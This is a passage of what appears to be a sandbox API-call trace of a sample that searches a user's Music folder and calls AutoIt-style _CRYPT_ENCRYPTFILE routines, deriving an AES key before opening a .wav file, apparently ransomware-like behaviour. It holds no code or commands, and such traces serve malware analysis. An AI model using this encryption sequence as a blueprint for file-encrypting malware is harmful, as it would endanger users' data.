lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Duuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.082] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.082] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0182.082] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.082] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.082] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.082] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.082] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.082] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0182.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0x90af58 [0182.083] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0182.083] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.083] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.083] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0182.083] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.083] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.083] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0182.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.084] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0182.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0182.085] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.085] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.085] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0182.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.085] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.085] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.085] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.085] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.085] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.086] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.086] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.086] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.086] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.086] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.087] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.087] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.087] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.087] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.087] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0182.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.087] CryptDestroyHash (hHash=0x90ae18) returned 1 [0182.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\r64i-tkxh1f.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.088] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.088] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0182.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 